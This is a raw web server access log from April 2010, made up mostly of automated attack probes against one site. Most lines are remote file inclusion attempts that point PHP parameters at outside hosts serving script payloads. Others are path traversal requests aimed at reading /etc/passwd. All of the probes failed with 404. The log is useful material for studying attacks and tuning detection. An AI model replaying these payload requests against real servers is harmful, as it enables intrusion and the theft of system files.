121.254.235.62 - - [09/Apr/2010:09:15:23 -0500] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
81.52.143.33 - - [09/Apr/2010:09:15:28 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
207.46.13.85 - - [09/Apr/2010:09:17:30 -0500] "GET /logs/access_log.1219795200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.115.213.103 - - [09/Apr/2010:09:17:37 -0500] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.most4wheels.com/php///bbs//id1.txt?????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
211.115.213.103 - - [09/Apr/2010:09:17:43 -0500] "GET /logs/access_log.1268956800%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.most4wheels.com/php///bbs//id1.txt?????? HTTP/1.1" 404 360 "-""Mozilla/5.0"
211.115.213.103 - - [09/Apr/2010:09:17:44 -0500] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.most4wheels.com/php///bbs//id1.txt?????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
211.115.213.103 - - [09/Apr/2010:09:17:45 -0500] "GET /logs/access_log.1268956800%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.most4wheels.com/php///bbs//id1.txt?????? HTTP/1.1" 404 360 "-""Mozilla/5.0"
211.115.213.103 - - [09/Apr/2010:09:17:45 -0500] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.most4wheels.com/php///bbs//id1.txt?????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.115.213.103 - - [09/Apr/2010:09:17:49 -0500] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.most4wheels.com/php///bbs//id1.txt?????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
209.216.43.133 - - [09/Apr/2010:09:19:02 -0500] "GET /index.php?menu=deti&page=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
209.216.43.133 - - [09/Apr/2010:09:19:02 -0500] "GET /logs/access_log.1243036800/index.php?menu=deti&page=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.216.43.133 - - [09/Apr/2010:09:19:02 -0500] "GET /logs/access_log.1259798400/index.php?menu=deti&page=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.216.43.133 - - [09/Apr/2010:09:19:02 -0500] "GET /logs/index.php?menu=deti&page=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
68.42.67.56 - - [09/Apr/2010:09:19:38 -0500] "GET /artwork/shootingfishinabarrel.png HTTP/1.1" 200 55770 "http://englishpatterns.com/community/240""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
209.216.43.133 - - [09/Apr/2010:09:19:48 -0500] "GET /index.php?menu=deti&page=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
209.216.43.133 - - [09/Apr/2010:09:19:48 -0500] "GET /logs/index.php?menu=deti&page=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
209.216.43.133 - - [09/Apr/2010:09:19:48 -0500] "GET /logs/access_log.1259798400/index.php?menu=deti&page=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.216.43.133 - - [09/Apr/2010:09:19:58 -0500] "GET /logs/access_log.1243036800/index.php?menu=deti&page=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
202.154.177.234 - - [09/Apr/2010:09:23:02 -0500] "GET /logs/access_log.1268956800//frame.php?framefile=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
202.154.177.234 - - [09/Apr/2010:09:23:04 -0500] "GET //frame.php?framefile=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
202.154.177.234 - - [09/Apr/2010:09:23:04 -0500] "GET /logs//frame.php?framefile=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
202.154.177.234 - - [09/Apr/2010:09:23:44 -0500] "GET //frame.php?framefile=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
202.154.177.234 - - [09/Apr/2010:09:23:56 -0500] "GET //faqsupport/wce.download.php?download=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-""libwww-perl/5.805"
207.46.13.41 - - [09/Apr/2010:09:25:29 -0500] "GET /logs/access_log.1203465600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.133.122.210 - - [09/Apr/2010:09:26:37 -0500] "GET /logs/access_log.1217203200//include/write.php?dir=http://www.rittsound.com//components/com_akobook//id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
174.133.122.210 - - [09/Apr/2010:09:27:46 -0500] "GET //common/db.php?commonpath=http://smash2.fileave.com/zfxid1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
174.133.122.210 - - [09/Apr/2010:09:27:46 -0500] "GET /logs//common/db.php?commonpath=http://smash2.fileave.com/zfxid1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
174.133.122.210 - - [09/Apr/2010:09:27:46 -0500] "GET /logs/access_log.1268265600%20%20//common/db.php?commonpath=http://smash2.fileave.com/zfxid1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:28:55 -0500] "GET /logs/access_log.1212969600/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
202.154.177.234 - - [09/Apr/2010:09:30:42 -0500] "GET /logs/access_log.1224460800//faqsupport/wce.download.php?download=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 339 "-""libwww-perl/5.805"
202.154.177.234 - - [09/Apr/2010:09:30:43 -0500] "GET //faqsupport/wce.download.php?download=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-""libwww-perl/5.805"
202.154.177.234 - - [09/Apr/2010:09:30:44 -0500] "GET /logs//faqsupport/wce.download.php?download=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 317 "-""libwww-perl/5.805"
121.254.235.62 - - [09/Apr/2010:09:31:40 -0500] "GET /noticias.php?arq=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
121.254.235.62 - - [09/Apr/2010:09:31:40 -0500] "GET /logs/noticias.php?arq=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
121.254.235.62 - - [09/Apr/2010:09:31:41 -0500] "GET /logs/access_log.1257292800/noticias.php?arq=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
211.115.213.103 - - [09/Apr/2010:09:31:49 -0500] "GET /logs/noticias.php?arq=http://www.most4wheels.com/php///bbs//id1.txt?????? HTTP/1.1" 404 301 "-""Mozilla/5.0"
211.115.213.103 - - [09/Apr/2010:09:31:49 -0500] "GET /logs/access_log.1257292800/noticias.php?arq=http://www.most4wheels.com/php///bbs//id1.txt?????? HTTP/1.1" 404 323 "-""Mozilla/5.0"
211.115.213.103 - - [09/Apr/2010:09:31:49 -0500] "GET /noticias.php?arq=http://www.most4wheels.com/php///bbs//id1.txt?????? HTTP/1.1" 404 296 "-""Mozilla/5.0"
211.115.213.103 - - [09/Apr/2010:09:31:49 -0500] "GET /logs/noticias.php?arq=http://www.most4wheels.com/php///bbs//id1.txt?????? HTTP/1.1" 404 301 "-""Mozilla/5.0"
211.115.213.103 - - [09/Apr/2010:09:31:49 -0500] "GET /logs/access_log.1257292800/noticias.php?arq=http://www.most4wheels.com/php///bbs//id1.txt?????? HTTP/1.1" 404 323 "-""Mozilla/5.0"
216.18.20.210 - - [09/Apr/2010:09:32:21 -0500] "GET /logs//includes/functions_common.php/modules/vwar/admin/admin.php?vwar_root=http://www.hongkongtravel.co.kr/you4/data/byz9991.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
216.18.20.210 - - [09/Apr/2010:09:32:21 -0500] "GET //includes/functions_common.php/modules/vwar/admin/admin.php?vwar_root=http://www.hongkongtravel.co.kr/you4/data/byz9991.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
216.18.20.210 - - [09/Apr/2010:09:32:21 -0500] "GET /logs/access_log.1215648000//includes/functions_common.php/modules/vwar/admin/admin.php?vwar_root=http://www.hongkongtravel.co.kr/you4/data/byz9991.txt??? HTTP/1.1" 404 370 "-""Mozilla/5.0"
216.18.20.210 - - [09/Apr/2010:09:32:46 -0500] "GET //includes/functions_common.php/modules/vwar/admin/admin.php?vwar_root=http://www.hongkongtravel.co.kr/you4/data/byz9991.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
216.18.20.210 - - [09/Apr/2010:09:32:46 -0500] "GET /logs//includes/functions_common.php/modules/vwar/admin/admin.php?vwar_root=http://www.hongkongtravel.co.kr/you4/data/byz9991.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
216.18.20.210 - - [09/Apr/2010:09:32:46 -0500] "GET /logs/access_log.1215648000//includes/functions_common.php/modules/vwar/admin/admin.php?vwar_root=http://www.hongkongtravel.co.kr/you4/data/byz9991.txt??? HTTP/1.1" 404 370 "-""Mozilla/5.0"
77.221.130.16 - - [09/Apr/2010:09:32:49 -0500] "GET /logs/access_log.1217203200//include/write.php?dir=http://www.rittsound.com//components/com_akobook//id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:33:31 -0500] "GET /logs/access_log.1212969600/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
202.71.108.26 - - [09/Apr/2010:09:33:42 -0500] "GET /logs/access_log.1219708800//index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
202.71.108.26 - - [09/Apr/2010:09:33:42 -0500] "GET //index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
202.71.108.26 - - [09/Apr/2010:09:33:43 -0500] "GET /logs//index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
202.71.108.26 - - [09/Apr/2010:09:34:04 -0500] "GET /logs/access_log.1220054400//index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
202.71.108.26 - - [09/Apr/2010:09:35:57 -0500] "GET /logs/access_log.1218067200%20//index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""libwww-perl/5.79"
61.67.201.187 - - [09/Apr/2010:09:38:53 -0500] "GET ///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:38:53 -0500] "GET /logs/access_log.1219536000///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:38:53 -0500] "GET /logs///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:38:53 -0500] "GET /logs/access_log.1237852800///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:39:01 -0500] "GET /logs///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:39:01 -0500] "GET ///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:39:01 -0500] "GET /logs/access_log.1237852800///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:39:01 -0500] "GET /logs/access_log.1219536000///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:39:03 -0500] "GET /logs/access_log.1219536000///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:39:03 -0500] "GET /logs///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:39:03 -0500] "GET ///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:39:03 -0500] "GET /logs/access_log.1237852800///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:42:54 -0500] "GET /logs/access_log.1268265600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:42:54 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:42:54 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:43:51 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:43:51 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:43:51 -0500] "GET /logs/access_log.1268265600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
207.46.199.47 - - [09/Apr/2010:09:44:02 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
61.67.201.187 - - [09/Apr/2010:09:44:25 -0500] "GET /logs/access_log.1268265600%20%20///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:44:48 -0500] "GET /logs/access_log.1235520000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:44:48 -0500] "GET /logs/access_log.1219536000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
207.46.199.47 - - [09/Apr/2010:09:44:58 -0500] "GET /logs/access_log.1235779200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
61.67.201.187 - - [09/Apr/2010:09:45:46 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:45:46 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:45:46 -0500] "GET /logs/access_log.1219536000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:45:46 -0500] "GET /logs/access_log.1235520000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:47:30 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:47:30 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:47:30 -0500] "GET /logs/access_log.1268265600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:47:46 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:47:46 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:47:46 -0500] "GET /logs/access_log.1268265600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:47:48 -0500] "GET /logs/access_log.1268265600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:47:48 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:47:49 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:48:45 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:48:45 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:48:45 -0500] "GET /logs/access_log.1268265600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:48:52 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:48:52 -0500] "GET /logs/access_log.1268265600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:48:52 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:48:54 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:48:54 -0500] "GET /logs/access_log.1268265600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:48:54 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:49:02 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:49:02 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:49:07 -0500] "GET /logs/access_log.1268265600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:49:24 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:49:24 -0500] "GET /logs/access_log.1268265600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:49:24 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:49:29 -0500] "GET /logs/access_log.1235520000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:49:29 -0500] "GET /logs/access_log.1219536000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:49:41 -0500] "GET /logs/access_log.1235520000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:49:41 -0500] "GET /logs/access_log.1219536000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:50:01 -0500] "GET /logs/access_log.1268265600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
61.67.201.187 - - [09/Apr/2010:09:51:35 -0500] "GET /logs/access_log.1268265600%20%20///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
209.216.43.133 - - [09/Apr/2010:09:51:38 -0500] "GET /logs/access_log.1268265600%20%20/index0.php?show=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
209.216.43.133 - - [09/Apr/2010:09:51:38 -0500] "GET /logs/index0.php?show=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.216.43.133 - - [09/Apr/2010:09:51:38 -0500] "GET /index0.php?show=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
209.216.43.133 - - [09/Apr/2010:09:51:39 -0500] "GET /index0.php?show=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
209.216.43.133 - - [09/Apr/2010:09:51:39 -0500] "GET /logs/index0.php?show=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.216.43.133 - - [09/Apr/2010:09:51:39 -0500] "GET /logs/access_log.1268265600%20%20/index0.php?show=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
209.216.43.133 - - [09/Apr/2010:09:51:46 -0500] "GET /index0.php?show=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
209.216.43.133 - - [09/Apr/2010:09:51:46 -0500] "GET /logs/access_log.1259798400/index0.php?show=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.216.43.133 - - [09/Apr/2010:09:51:47 -0500] "GET /logs/index0.php?show=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.216.43.133 - - [09/Apr/2010:09:52:09 -0500] "GET /logs/index0.php?show=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.216.43.133 - - [09/Apr/2010:09:52:09 -0500] "GET /index0.php?show=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
209.216.43.133 - - [09/Apr/2010:09:52:10 -0500] "GET /logs/access_log.1259798400/index0.php?show=http://www.kioscomayor.com///caricatura/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
